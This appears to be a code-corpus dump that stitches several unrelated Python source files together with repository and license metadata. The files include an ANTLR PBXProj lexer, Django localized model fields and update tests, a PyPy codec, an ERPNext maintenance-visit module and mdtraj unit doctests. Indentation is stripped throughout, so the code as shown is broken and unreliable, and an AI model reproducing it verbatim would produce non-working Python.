buf.write("\7u\2\2\u0823\u00ea\3\2\2\2\u0824\u0825\7k\2\2\u0825\u0826")
buf.write("\7u\2\2\u0826\u0827\7c\2\2\u0827\u00ec\3\2\2\2\u0828\u0829")
buf.write("\7q\2\2\u0829\u082a\7d\2\2\u082a\u082b\7l\2\2\u082b\u082c")
buf.write("\7g\2\2\u082c\u082d\7e\2\2\u082d\u082e\7v\2\2\u082e\u082f")
buf.write("\7u\2\2\u082f\u00ee\3\2\2\2\u0830\u0831\7t\2\2\u0831\u0832")
buf.write("\7q\2\2\u0832\u0833\7q\2\2\u0833\u0834\7v\2\2\u0834\u0835")
buf.write("\7Q\2\2\u0835\u0836\7d\2\2\u0836\u0837\7l\2\2\u0837\u0838")
buf.write("\7g\2\2\u0838\u0839\7e\2\2\u0839\u083a\7v\2\2\u083a\u00f0")
buf.write("\3\2\2\2\u083b\u083d\4\62;\2\u083c\u083b\3\2\2\2\u083d")
buf.write("\u083e\3\2\2\2\u083e\u083c\3\2\2\2\u083e\u083f\3\2\2\2")
buf.write("\u083f\u00f2\3\2\2\2\u0840\u0841\7\60\2\2\u0841\u00f4")
buf.write("\3\2\2\2\u0842\u0843\t\2\2\2\u0843\u00f6\3\2\2\2\u0844")
buf.write("\u0845\t\3\2\2\u0845\u00f8\3\2\2\2\u0846\u0847\7/\2\2")
buf.write("\u0847\u00fa\3\2\2\2\u0848\u0849\7a\2\2\u0849\u00fc\3")
buf.write("\2\2\2\u084a\u084b\7\61\2\2\u084b\u00fe\3\2\2\2\u084c")
buf.write("\u084d\5\u0107\u0084\2\u084d\u084e\5\u0107\u0084\2\u084e")
buf.write("\u084f\5\u0107\u0084\2\u084f\u0850\5\u0107\u0084\2\u0850")
buf.write("\u0851\5\u0107\u0084\2\u0851\u0852\5\u0107\u0084\2\u0852")
buf.write("\u0853\5\u0107\u0084\2\u0853\u0854\5\u0107\u0084\2\u0854")
buf.write("\u0855\5\u0107\u0084\2\u0855\u0856\5\u0107\u0084\2\u0856")
buf.write("\u0857\5\u0107\u0084\2\u0857\u0858\5\u0107\u0084\2\u0858")
buf.write("\u0859\5\u0107\u0084\2\u0859\u085a\5\u0107\u0084\2\u085a")
buf.write("\u085b\5\u0107\u0084\2\u085b\u085c\5\u0107\u0084\2\u085c")
buf.write("\u085d\5\u0107\u0084\2\u085d\u085e\5\u0107\u0084\2\u085e")
buf.write("\u085f\5\u0107\u0084\2\u085f\u0860\5\u0107\u0084\2\u0860")
buf.write("\u0861\5\u0107\u0084\2\u0861\u0862\5\u0107\u0084\2\u0862")
buf.write("\u0863\5\u0107\u0084\2\u0863\u0864\5\u0107\u0084\2\u0864")
buf.write("\u088b\3\2\2\2\u0865\u0866\7H\2\2\u0866\u0867\7T\2\2\u0867")
buf.write("\u086b\7a\2\2\u0868\u0869\7I\2\2\u0869\u086b\7a\2\2\u086a")
buf.write("\u0865\3\2\2\2\u086a\u0868\3\2\2\2\u086b\u086d\3\2\2\2")
buf.write("\u086c\u086e\5\u0107\u0084\2\u086d\u086c\3\2\2\2\u086e")
buf.write("\u086f\3\2\2\2\u086f\u086d\3\2\2\2\u086f\u0870\3\2\2\2")
buf.write("\u0870\u088b\3\2\2\2\u0871\u0872\5\u00f7|\2\u0872\u0873")
buf.write("\5\u00f7|\2\u0873\u0874\5\u00f7|\2\u0874\u0875\5\u00f7")
buf.write("|\2\u0875\u0876\5\u00f7|\2\u0876\u0877\5\u00f7|\2\u0877")
buf.write("\u0878\5\u00f7|\2\u0878\u0879\5\u00f7|\2\u0879\u087a\5")
buf.write("\u00f7|\2\u087a\u087b\5\u00f7|\2\u087b\u087c\5\u00f7|")
buf.write("\2\u087c\u087d\5\u00f7|\2\u087d\u087e\5\u00f7|\2\u087e")
buf.write("\u087f\5\u00f7|\2\u087f\u0880\5\u00f7|\2\u0880\u0881\5")
buf.write("\u00f7|\2\u0881\u0882\5\u00f7|\2\u0882\u0883\5\u00f7|")
buf.write("\2\u0883\u0884\5\u00f7|\2\u0884\u0885\5\u00f7|\2\u0885")
buf.write("\u0886\5\u00f7|\2\u0886\u0887\5\u00f7|\2\u0887\u0888\5")
buf.write("\u00f7|\2\u0888\u0889\5\u00f7|\2\u0889\u088b\3\2\2\2\u088a")
buf.write("\u084c\3\2\2\2\u088a\u086a\3\2\2\2\u088a\u0871\3\2\2\2")
buf.write("\u088b\u0100\3\2\2\2\u088c\u088e\7$\2\2\u088d\u088f\5")
buf.write("\u0109\u0085\2\u088e\u088d\3\2\2\2\u088f\u0890\3\2\2\2")
buf.write("\u0890\u088e\3\2\2\2\u0890\u0891\3\2\2\2\u0891\u0892\3")
buf.write("\2\2\2\u0892\u0893\7$\2\2\u0893\u0897\3\2\2\2\u0894\u0895")
buf.write("\7$\2\2\u0895\u0897\7$\2\2\u0896\u088c\3\2\2\2\u0896\u0894")
buf.write("\3\2\2\2\u0897\u0102\3\2\2\2\u0898\u089e\5\u00f5{\2\u0899")
buf.write("\u089e\5\u00fb~\2\u089a\u089e\5\u00f9}\2\u089b\u089e\5")
buf.write("\u00fd\177\2\u089c\u089e\5\u00f3z\2\u089d\u0898\3\2\2")
buf.write("\2\u089d\u0899\3\2\2\2\u089d\u089a\3\2\2\2\u089d\u089b")
buf.write("\3\2\2\2\u089d\u089c\3\2\2\2\u089e\u089f\3\2\2\2\u089f")
buf.write("\u089d\3\2\2\2\u089f\u08a0\3\2\2\2\u08a0\u0104\3\2\2\2")
buf.write("\u08a1\u08a2\7&\2\2\u08a2\u08a3\5\u0103\u0082\2\u08a3")
buf.write("\u0106\3\2\2\2\u08a4\u08a5\t\4\2\2\u08a5\u0108\3\2\2\2")
buf.write("\u08a6\u08aa\n\5\2\2\u08a7\u08a8\7^\2\2\u08a8\u08aa\7")
buf.write("$\2\2\u08a9\u08a6\3\2\2\2\u08a9\u08a7\3\2\2\2\u08aa\u010a")
buf.write("\3\2\2\2\u08ab\u08ad\t\6\2\2\u08ac\u08ab\3\2\2\2\u08ad")
buf.write("\u08ae\3\2\2\2\u08ae\u08ac\3\2\2\2\u08ae\u08af\3\2\2\2")
buf.write("\u08af\u08b0\3\2\2\2\u08b0\u08b1\b\u0086\2\2\u08b1\u010c")
buf.write("\3\2\2\2\u08b2\u08b3\7\61\2\2\u08b3\u08b4\7,\2\2\u08b4")
buf.write("\u08b8\3\2\2\2\u08b5\u08b7\13\2\2\2\u08b6\u08b5\3\2\2")
buf.write("\2\u08b7\u08ba\3\2\2\2\u08b8\u08b9\3\2\2\2\u08b8\u08b6")
buf.write("\3\2\2\2\u08b9\u08bb\3\2\2\2\u08ba\u08b8\3\2\2\2\u08bb")
buf.write("\u08bc\7,\2\2\u08bc\u08bd\7\61\2\2\u08bd\u08be\3\2\2\2")
buf.write("\u08be\u08bf\b\u0087\2\2\u08bf\u010e\3\2\2\2\u08c0\u08c1")
buf.write("\7\61\2\2\u08c1\u08c2\7\61\2\2\u08c2\u08c6\3\2\2\2\u08c3")
buf.write("\u08c5\n\7\2\2\u08c4\u08c3\3\2\2\2\u08c5\u08c8\3\2\2\2")
buf.write("\u08c6\u08c4\3\2\2\2\u08c6\u08c7\3\2\2\2\u08c7\u08c9\3")
buf.write("\2\2\2\u08c8\u08c6\3\2\2\2\u08c9\u08ca\b\u0088\2\2\u08ca")
buf.write("\u0110\3\2\2\2\17\2\u083e\u086a\u086f\u088a\u0890\u0896")
buf.write("\u089d\u089f\u08a9\u08ae\u08b8\u08c6\3\b\2\2")
return buf.getvalue()
class PBXProjLexer(Lexer):
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
T__0 = 1
T__1 = 2
T__2 = 3
T__3 = 4
T__4 = 5
T__5 = 6
T__6 = 7
T__7 = 8
T__8 = 9
T__9 = 10
T__10 = 11
T__11 = 12
T__12 = 13
T__13 = 14
T__14 = 15
T__15 = 16
T__16 = 17
T__17 = 18
T__18 = 19
T__19 = 20
T__20 = 21
T__21 = 22
T__22 = 23
T__23 = 24
T__24 = 25
T__25 = 26
T__26 = 27
T__27 = 28
T__28 = 29
T__29 = 30
T__30 = 31
T__31 = 32
T__32 = 33
T__33 = 34
T__34 = 35
T__35 = 36
T__36 = 37
T__37 = 38
T__38 = 39
T__39 = 40
T__40 = 41
T__41 = 42
T__42 = 43
T__43 = 44
T__44 = 45
T__45 = 46
T__46 = 47
T__47 = 48
T__48 = 49
T__49 = 50
T__50 = 51
T__51 = 52
T__52 = 53
T__53 = 54
T__54 = 55
T__55 = 56
T__56 = 57
T__57 = 58
T__58 = 59
T__59 = 60
T__60 = 61
T__61 = 62
T__62 = 63
T__63 = 64
T__64 = 65
T__65 = 66
T__66 = 67
T__67 = 68
T__68 = 69
T__69 = 70
T__70 = 71
T__71 = 72
T__72 = 73
T__73 = 74
T__74 = 75
T__75 = 76
T__76 = 77
T__77 = 78
T__78 = 79
T__79 = 80
T__80 = 81
T__81 = 82
T__82 = 83
T__83 = 84
T__84 = 85
T__85 = 86
T__86 = 87
T__87 = 88
T__88 = 89
T__89 = 90
T__90 = 91
T__91 = 92
T__92 = 93
T__93 = 94
T__94 = 95
T__95 = 96
T__96 = 97
T__97 = 98
T__98 = 99
T__99 = 100
T__100 = 101
T__101 = 102
T__102 = 103
T__103 = 104
T__104 = 105
T__105 = 106
T__106 = 107
T__107 = 108
T__108 = 109
T__109 = 110
T__110 = 111
T__111 = 112
T__112 = 113
T__113 = 114
T__114 = 115
CLASSES = 116
ISA = 117
OBJECTS = 118
ROOT_OBJECT = 119
NUMBER = 120
DOT = 121
ALPHA_NUMERIC = 122
ALPHA_NUMERIC_CAP = 123
DASH = 124
UNDERSCORE = 125
SLASH = 126
REFERENCE = 127
QUOTED_STRING = 128
NON_QUOTED_STRING = 129
VARIABLE = 130
WS = 131
COMMENT = 132
LINE_COMMENT = 133
channelNames = [ u"DEFAULT_TOKEN_CHANNEL", u"HIDDEN" ]
modeNames = [ "DEFAULT_MODE" ]
literalNames = [ "<INVALID>",
"'{'", "'}'", "'archiveVersion'", "'='", "';'", "'objectVersion'",
"'PBXAggregateTarget'", "'PBXBuildFile'", "'PBXContainerItemProxy'",
"'PBXCopyFilesBuildPhase'", "'PBXFileReference'", "'PBXFrameworksBuildPhase'",
"'PBXGroup'", "'PBXHeadersBuildPhase'", "'PBXNativeTarget'",
"'PBXProject'", "'PBXReferenceProxy'", "'PBXResourcesBuildPhase'",
"'PBXShellScriptBuildPhase'", "'PBXSourcesBuildPhase'", "'PBXTargetDependency'",
"'PBXVariantGroup'", "'XCBuildConfiguration'", "'XCConfigurationList'",
"'XCRemoteSwiftPackageReference'", "'XCSwiftPackageProductDependency'",
"'XCVersionGroup'", "'fileRef'", "'productRef'", "'containerPortal'",
"'proxyType'", "'remoteGlobalIDString'", "'remoteInfo'", "'fileEncoding'",
"'explicitFileType'", "'lastKnownFileType'", "'includeInIndex'",
"'indentWidth'", "'tabWidth'", "'usesTabs'", "'platformFilter'",
"'children'", "'productInstallPath'", "'repositoryURL'", "'requirement'",
"'package'", "'packageProductDependencies'", "'name'", "'path'",
"'sourceTree'", "'buildActionMask'", "'files'", "'runOnlyForDeploymentPostprocessing'",
"'('", "','", "')'", "'buildConfigurationList'", "'buildPhases'",
"'buildRules'", "'dependencies'", "'productName'", "'productReference'",
"'productType'", "'lineEnding'", "'xcLanguageSpecificationIdentifier'",
"'plistStructureDefinitionIdentifier'", "'attributes'", "'LastSwiftMigration'",
"'DefaultBuildSystemTypeForWorkspace'", "'LastSwiftUpdateCheck'",
"'BuildIndependentTargetsInParallel'", "'LastTestingUpgradeCheck'",
"'LastUpgradeCheck'", "'ORGANIZATIONNAME'", "'TargetAttributes'",
"'CreatedOnToolsVersion'", "'TestTargetID'", "'DevelopmentTeam'",
"'ProvisioningStyle'", "'compatibilityVersion'", "'developmentRegion'",
"'hasScannedForEncodings'", "'knownRegions'", "'mainGroup'",
"'productRefGroup'", "'packageReferences'", "'projectDirPath'",
"'projectReferences'", "'projectRoot'", "'targets'", "'inputFileListPaths'",
"'inputPaths'", "'outputFileListPaths'", "'outputPaths'", "'shellPath'",
"'shellScript'", "'showEnvVarsInLog'", "'target'", "'targetProxy'",
"'fileType'", "'remoteRef'", "'baseConfigurationReference'",
"'buildSettings'", "'dstPath'", "'dstSubfolderSpec'", "'ProductGroup'",
"'ProjectRef'", "'buildConfigurations'", "'defaultConfigurationIsVisible'",
"'defaultConfigurationName'", "'settings'", "'SystemCapabilities'",
"'currentVersion'", "'versionGroupType'", "'CLASSPREFIX'", "'classes'",
"'isa'", "'objects'", "'rootObject'", "'.'", "'-'", "'_'", "'/'" ]
symbolicNames = [ "<INVALID>",
"CLASSES", "ISA", "OBJECTS", "ROOT_OBJECT", "NUMBER", "DOT",
"ALPHA_NUMERIC", "ALPHA_NUMERIC_CAP", "DASH", "UNDERSCORE",
"SLASH", "REFERENCE", "QUOTED_STRING", "NON_QUOTED_STRING",
"VARIABLE", "WS", "COMMENT", "LINE_COMMENT" ]
ruleNames = [ "T__0", "T__1", "T__2", "T__3", "T__4", "T__5", "T__6",
"T__7", "T__8", "T__9", "T__10", "T__11", "T__12", "T__13",
"T__14", "T__15", "T__16", "T__17", "T__18", "T__19",
"T__20", "T__21", "T__22", "T__23", "T__24", "T__25",
"T__26", "T__27", "T__28", "T__29", "T__30", "T__31",
"T__32", "T__33", "T__34", "T__35", "T__36", "T__37",
"T__38", "T__39", "T__40", "T__41", "T__42", "T__43",
"T__44", "T__45", "T__46", "T__47", "T__48", "T__49",
"T__50", "T__51", "T__52", "T__53", "T__54", "T__55",
"T__56", "T__57", "T__58", "T__59", "T__60", "T__61",
"T__62", "T__63", "T__64", "T__65", "T__66", "T__67",
"T__68", "T__69", "T__70", "T__71", "T__72", "T__73",
"T__74", "T__75", "T__76", "T__77", "T__78", "T__79",
"T__80", "T__81", "T__82", "T__83", "T__84", "T__85",
"T__86", "T__87", "T__88", "T__89", "T__90", "T__91",
"T__92", "T__93", "T__94", "T__95", "T__96", "T__97",
"T__98", "T__99", "T__100", "T__101", "T__102", "T__103",
"T__104", "T__105", "T__106", "T__107", "T__108", "T__109",
"T__110", "T__111", "T__112", "T__113", "T__114", "CLASSES",
"ISA", "OBJECTS", "ROOT_OBJECT", "NUMBER", "DOT", "ALPHA_NUMERIC",
"ALPHA_NUMERIC_CAP", "DASH", "UNDERSCORE", "SLASH", "REFERENCE",
"QUOTED_STRING", "NON_QUOTED_STRING", "VARIABLE", "HEX",
"QUOTED_STRING_CHARACTER", "WS", "COMMENT", "LINE_COMMENT" ]
grammarFileName = "PBXProj.g4"
def __init__(self, input=None, output:TextIO = sys.stdout):
super().__init__(input, output)
self.checkVersion("4.9.2")
self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())
self._actions = None
self._predicates = None
|
apache-2.0
|
jonasundderwolf/django-localizedfields
|
localizedfields/fields.py
|
1
|
7494
|
from composite_field.base import CompositeField
from django.conf import settings
from django.db import models
from django.utils import translation
from django.utils.functional import lazy
from .utils import (
SHORT_LANGUAGES,
LanguageAwareUploadToDirectory,
for_all_languages,
get_language,
localized_field,
short_language,
)
def get_localized(self, lang, name):
lang = lang or get_language() or settings.LANGUAGE_CODE
try:
attr = getattr(self, localized_field(name, lang))
except AttributeError as e:
raise AttributeError(
'Either field "%s" does not exist, or language "%s" is not defined '
"for this model. (%s)" % (name, lang, e)
)
return attr
def set_localized(self, lang, name, value):
lang = lang or get_language() or settings.LANGUAGE_CODE
try:
attr = setattr(self, localized_field(name, lang), value)
except AttributeError as e:
raise AttributeError(
'Either field "%s" does not exist, or language "%s" is not defined '
"for this model. (%s)" % (name, lang, e)
)
return attr
def set_all_localized(self, name, func, *args, **kwargs):
for k, v in for_all_languages(func, *args, **kwargs).items():
self.set_localized(k, name, v)
class LocalizedField(CompositeField):
def __init__(self, field_class, *args, **kwargs):
"""
Adds a model field of type "field_class" with translations for all languages.
Fallback can have one if these values:
None (default): an empty field value in an object that's marked as
"translated" for that language, will return the empty value.
True: fallback to the default language in case the field is empty
or the fallback is checked in admin (saved in
model.translated_languages)
False: never fallback, even when the object is not translated
"""
super(LocalizedField, self).__init__()
self.verbose_name = kwargs.pop("verbose_name", None)
self.fallback = kwargs.pop("fallback", None)
# we can't check for blanks, one language might always be blank
kwargs.pop("blank", False)
for language in SHORT_LANGUAGES:
self[language] = field_class(blank=True, *args, **kwargs)
def contribute_to_class(self, cls, field_name):
if self.verbose_name is None:
self.verbose_name = field_name.replace("_", " ").capitalize()
for language in self:
self[language].verbose_name = lazy(
lambda language: self.verbose_name + " (" + language + ")", str
)(language)
# Save a reference to the composite field for later use
self[language].composite_field = self
super(LocalizedField, self).contribute_to_class(cls, field_name)
# monkeypatch some helper functions to the class
cls.get_localized = get_localized
cls.set_localized = set_localized
cls.set_all_localized = set_all_localized
def get(self, model):
# get current value
translation = getattr(model, self.prefix + short_language())
if self.fallback is False:
# we don't fallback, return the value
return translation
translated_languages = getattr(model, "translated_languages", "")
# only applies to models with translated_languages
if get_language() is None:
language = ""
else:
language = get_language()
if translated_languages:
# fallback to default if language not translated
if language not in translated_languages:
return getattr(
model, self.prefix + short_language(settings.LANGUAGE_CODE)
)
else:
if language not in getattr(model.parent, "translated_languages", ""):
return getattr(
model, self.prefix + short_language(settings.LANGUAGE_CODE)
)
if translation or not self.fallback:
# show translation only if it exists or we have disabled fallback
return translation
# fallback to default language
return getattr(model, self.prefix + short_language(settings.LANGUAGE_CODE))
def set(self, model, value):
from django.utils.functional import Promise
language = short_language()
# XXX is there a better way to detect ugettext_lazy objects?
if isinstance(value, Promise):
with translation.override(language):
value = str(value)
setattr(model, self.prefix + short_language(), value)
class LocalizedCharField(LocalizedField):
def __init__(self, *args, **kwargs):
super(LocalizedCharField, self).__init__(models.CharField, *args, **kwargs)
class LocalizedTextField(LocalizedField):
def __init__(self, *args, **kwargs):
super(LocalizedTextField, self).__init__(models.TextField, *args, **kwargs)
class LocalizedFileField(LocalizedField):
def __init__(self, *args, **kwargs):
# call the grandparent's init()
upload_to_params = kwargs.pop("upload_to_params", None)
super(LocalizedField, self).__init__()
field_class = kwargs.pop("field_class", models.FileField)
self.verbose_name = kwargs.pop("verbose_name", None)
# fallback to english version by default
self.fallback = kwargs.pop("fallback", True)
# when we're localized, the field can always be empty in one language
if "blank" in kwargs:
del kwargs["blank"]
# set a higher max length for filenames
kwargs["max_length"] = 255
for language in SHORT_LANGUAGES:
if not upload_to_params:
upload_to_params = {}
upload_to_params.update({"language": language})
kwargs["upload_to"] = LanguageAwareUploadToDirectory(**upload_to_params)
self[language] = field_class(blank=True, *args, **kwargs)
class LocalizedImageField(LocalizedFileField):
def __init__(self, *args, **kwargs):
kwargs["field_class"] = models.ImageField
super(LocalizedImageField, self).__init__(models.ImageField, *args, **kwargs)
class LocalizedBooleanField(LocalizedField):
def __init__(self, *args, **kwargs):
super(LocalizedBooleanField, self).__init__(
models.BooleanField, *args, **kwargs
)
class LocalizedDateField(LocalizedField):
def __init__(self, *args, **kwargs):
super(LocalizedDateField, self).__init__(models.DateField, *args, **kwargs)
class LocalizedForeignKey(LocalizedField):
def __init__(self, *args, **kwargs):
super(LocalizedForeignKey, self).__init__(models.ForeignKey, *args, **kwargs)
class LocalizedURLField(LocalizedField):
def __init__(self, *args, **kwargs):
kwargs["fallback"] = kwargs.get("fallback", True)
super(LocalizedURLField, self).__init__(models.URLField, *args, **kwargs)
class LocalizedDecimalField(LocalizedField):
def __init__(self, *args, **kwargs):
super(LocalizedDecimalField, self).__init__(
models.DecimalField, *args, **kwargs
)
class LocalizedIntegerField(LocalizedField):
def __init__(self, *args, **kwargs):
super(LocalizedIntegerField, self).__init__(
models.IntegerField, *args, **kwargs
)
|
bsd-3-clause
|
bussiere/pypyjs
|
website/demo/home/rfk/repos/pypy/lib-python/2.7/encodings/iso2022_jp_2.py
|
816
|
1061
|
#
# iso2022_jp_2.py: Python Unicode Codec for ISO2022_JP_2
#
# Written by Hye-Shik Chang <[email protected]>
#
import _codecs_iso2022, codecs
import _multibytecodec as mbc
codec = _codecs_iso2022.getcodec('iso2022_jp_2')
class Codec(codecs.Codec):
encode = codec.encode
decode = codec.decode
class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,
codecs.IncrementalEncoder):
codec = codec
class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,
codecs.IncrementalDecoder):
codec = codec
class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
codec = codec
class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
codec = codec
def getregentry():
return codecs.CodecInfo(
name='iso2022_jp_2',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
|
mit
|
alx-eu/django
|
tests/modeltests/update/tests.py
|
118
|
4307
|
from __future__ import absolute_import, unicode_literals
from django.test import TestCase
from .models import A, B, C, D, DataPoint, RelatedPoint
class SimpleTest(TestCase):
def setUp(self):
self.a1 = A.objects.create()
self.a2 = A.objects.create()
for x in range(20):
B.objects.create(a=self.a1)
D.objects.create(a=self.a1)
def test_nonempty_update(self):
"""
Test that update changes the right number of rows for a nonempty queryset
"""
num_updated = self.a1.b_set.update(y=100)
self.assertEqual(num_updated, 20)
cnt = B.objects.filter(y=100).count()
self.assertEqual(cnt, 20)
def test_empty_update(self):
"""
Test that update changes the right number of rows for an empty queryset
"""
num_updated = self.a2.b_set.update(y=100)
self.assertEqual(num_updated, 0)
cnt = B.objects.filter(y=100).count()
self.assertEqual(cnt, 0)
def test_nonempty_update_with_inheritance(self):
"""
Test that update changes the right number of rows for an empty queryset
when the update affects only a base table
"""
num_updated = self.a1.d_set.update(y=100)
self.assertEqual(num_updated, 20)
cnt = D.objects.filter(y=100).count()
self.assertEqual(cnt, 20)
def test_empty_update_with_inheritance(self):
"""
Test that update changes the right number of rows for an empty queryset
when the update affects only a base table
"""
num_updated = self.a2.d_set.update(y=100)
self.assertEqual(num_updated, 0)
cnt = D.objects.filter(y=100).count()
self.assertEqual(cnt, 0)
class AdvancedTests(TestCase):
def setUp(self):
self.d0 = DataPoint.objects.create(name="d0", value="apple")
self.d2 = DataPoint.objects.create(name="d2", value="banana")
self.d3 = DataPoint.objects.create(name="d3", value="banana")
self.r1 = RelatedPoint.objects.create(name="r1", data=self.d3)
def test_update(self):
"""
Objects are updated by first filtering the candidates into a queryset
and then calling the update() method. It executes immediately and
returns nothing.
"""
resp = DataPoint.objects.filter(value="apple").update(name="d1")
self.assertEqual(resp, 1)
resp = DataPoint.objects.filter(value="apple")
self.assertEqual(list(resp), [self.d0])
def test_update_multiple_objects(self):
"""
We can update multiple objects at once.
"""
resp = DataPoint.objects.filter(value="banana").update(
value="pineapple")
self.assertEqual(resp, 2)
self.assertEqual(DataPoint.objects.get(name="d2").value, 'pineapple')
def test_update_fk(self):
"""
Foreign key fields can also be updated, although you can only update
the object referred to, not anything inside the related object.
"""
resp = RelatedPoint.objects.filter(name="r1").update(data=self.d0)
self.assertEqual(resp, 1)
resp = RelatedPoint.objects.filter(data__name="d0")
self.assertEqual(list(resp), [self.r1])
def test_update_multiple_fields(self):
"""
Multiple fields can be updated at once
"""
resp = DataPoint.objects.filter(value="apple").update(
value="fruit", another_value="peach")
self.assertEqual(resp, 1)
d = DataPoint.objects.get(name="d0")
self.assertEqual(d.value, 'fruit')
self.assertEqual(d.another_value, 'peach')
def test_update_all(self):
"""
In the rare case you want to update every instance of a model, update()
is also a manager method.
"""
self.assertEqual(DataPoint.objects.update(value='thing'), 3)
resp = DataPoint.objects.values('value').distinct()
self.assertEqual(list(resp), [{'value': 'thing'}])
def test_update_slice_fail(self):
"""
We do not support update on already sliced query sets.
"""
method = DataPoint.objects.all()[:2].update
self.assertRaises(AssertionError, method,
another_value='another thing')
|
bsd-3-clause
|
Tejal011089/osmosis_erpnext
|
erpnext/support/doctype/maintenance_visit/maintenance_visit.py
|
34
|
3196
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from erpnext.utilities.transaction_base import TransactionBase
class MaintenanceVisit(TransactionBase):
def get_feed(self):
return _("To {0}").format(self.customer_name)
def get_item_details(self, item_code):
return frappe.db.get_value("Item", item_code, ["item_name", "description"], as_dict=1)
def validate_serial_no(self):
for d in self.get('purposes'):
if d.serial_no and not frappe.db.exists("Serial No", d.serial_no):
frappe.throw(_("Serial No {0} does not exist").format(d.serial_no))
def validate(self):
self.validate_serial_no()
def update_customer_issue(self, flag):
for d in self.get('purposes'):
if d.prevdoc_docname and d.prevdoc_doctype == 'Warranty Claim' :
if flag==1:
mntc_date = self.mntc_date
service_person = d.service_person
work_done = d.work_done
status = "Open"
if self.completion_status == 'Fully Completed':
status = 'Closed'
elif self.completion_status == 'Partially Completed':
status = 'Work In Progress'
else:
nm = frappe.db.sql("select t1.name, t1.mntc_date, t2.service_person, t2.work_done from `tabMaintenance Visit` t1, `tabMaintenance Visit Purpose` t2 where t2.parent = t1.name and t1.completion_status = 'Partially Completed' and t2.prevdoc_docname = %s and t1.name!=%s and t1.docstatus = 1 order by t1.name desc limit 1", (d.prevdoc_docname, self.name))
if nm:
status = 'Work In Progress'
mntc_date = nm and nm[0][1] or ''
service_person = nm and nm[0][2] or ''
work_done = nm and nm[0][3] or ''
else:
status = 'Open'
mntc_date = ''
service_person = ''
work_done = ''
frappe.db.sql("update `tabWarranty Claim` set resolution_date=%s, resolved_by=%s, resolution_details=%s, status=%s where name =%s",(mntc_date,service_person,work_done,status,d.prevdoc_docname))
def check_if_last_visit(self):
"""check if last maintenance visit against same sales order/ Warranty Claim"""
check_for_docname = None
for d in self.get('purposes'):
if d.prevdoc_docname:
check_for_docname = d.prevdoc_docname
#check_for_doctype = d.prevdoc_doctype
if check_for_docname:
check = frappe.db.sql("select t1.name from `tabMaintenance Visit` t1, `tabMaintenance Visit Purpose` t2 where t2.parent = t1.name and t1.name!=%s and t2.prevdoc_docname=%s and t1.docstatus = 1 and (t1.mntc_date > %s or (t1.mntc_date = %s and t1.mntc_time > %s))", (self.name, check_for_docname, self.mntc_date, self.mntc_date, self.mntc_time))
if check:
check_lst = [x[0] for x in check]
check_lst =','.join(check_lst)
frappe.throw(_("Cancel Material Visits {0} before cancelling this Maintenance Visit").format(check_lst))
raise Exception
else:
self.update_customer_issue(0)
def on_submit(self):
self.update_customer_issue(1)
frappe.db.set(self, 'status', 'Submitted')
def on_cancel(self):
self.check_if_last_visit()
frappe.db.set(self, 'status', 'Cancelled')
def on_update(self):
pass
|
agpl-3.0
|
hainm/mdtraj
|
mdtraj/utils/unit/doctests.py
|
17
|
21017
|
"""
Module simtk.unit.doctests
Lots of in-place doctests would no longer work after I rearranged
so that specific unit definitions are defined late. So those tests
are here.
Examples
>>> furlong = BaseUnit(length_dimension, "furlong", "fur")
Examples
>>> furlong_base_unit = BaseUnit(length_dimension, "furlong", "fur")
>>> furlong_base_unit.define_conversion_factor_to(meter_base_unit, 201.16800)
>>> furlong_base_unit.conversion_factor_to(angstrom_base_unit)
2011680000000.0
Examples
>>> furlong_base_unit = BaseUnit(length_dimension, "furlong", "fur")
>>> furlong_base_unit.define_conversion_factor_to(meter_base_unit, 201.16800)
Examples
Some of these example test methods from Unit and Quantity
from unit.is_unit
>>> is_unit(meter)
True
>>> is_unit(5*meter)
False
>>> c = 1.0*calories
>>> c
Quantity(value=1.0, unit=calorie)
>>> print(calorie.conversion_factor_to(joule))
4.184
>>> print(joule.conversion_factor_to(calorie))
0.239005736138
>>> c.in_units_of(joules)
Quantity(value=4.1840000000000002, unit=joule)
>>> j = 1.0*joules
>>> j
Quantity(value=1.0, unit=joule)
>>> j.in_units_of(calories)
Quantity(value=0.23900573613766729, unit=calorie)
>>> j/joules
1.0
>>> print(j/calories)
0.239005736138
>>> print(c/joules)
4.184
>>> c/calories
1.0
>>> c**2
Quantity(value=1.0, unit=calorie**2)
>>> (c**2).in_units_of(joule*joule)
Quantity(value=17.505856000000001, unit=joule**2)
>>> ScaledUnit(1000.0, kelvin, "kilokelvin", "kK")
ScaledUnit(factor=1000.0, master=kelvin, name='kilokelvin', symbol='kK')
>>> str(ScaledUnit(1000.0, kelvin, "kilokelvin", "kK"))
'kilokelvin'
Examples
>>> meters > centimeters
True
>>> angstroms > centimeters
False
Examples
>>> print(meter / second)
meter/second
>>> print(meter / meter)
dimensionless
Heterogeneous units are not reduced unless they are in a quantity.
>>> print(meter / centimeter)
meter/centimeter
Examples
>>> meters_per_second = Unit({meter_base_unit: 1.0, second_base_unit: -1.0})
>>> print(meters_per_second)
meter/second
>>> us = UnitSystem([ScaledUnit(1.0, coulomb/second, "ampere", "A"), second_base_unit])
>>> print(us.express_unit(second))
second
>>> print(us.express_unit(coulomb/second))
ampere
>>> print(us.express_unit(coulomb))
second*ampere
>>> print(us.express_unit(meter/second))
meter/second
>>> us = UnitSystem([ScaledUnit(1.0, coulomb/second, "ampere", "A"), second_base_unit])
>>> print(us)
UnitSystem([ampere, second])
Examples
>>> meter.is_dimensionless()
False
>>> (meter/meter).is_dimensionless()
True
>>> print((meter*meter).sqrt())
meter
>>> meter.sqrt()
Traceback (most recent call last):
...
ArithmeticError: Exponents in Unit.sqrt() must be even.
>>> (meter*meter*meter).sqrt()
Traceback (most recent call last):
...
ArithmeticError: Exponents in Unit.sqrt() must be even.
>>> print((meter*meter/second/second).sqrt())
meter/second
Mixture of BaseUnits and ScaledUnits should cause no trouble:
>>> print(sqrt(kilogram*joule))
kilogram*meter/second
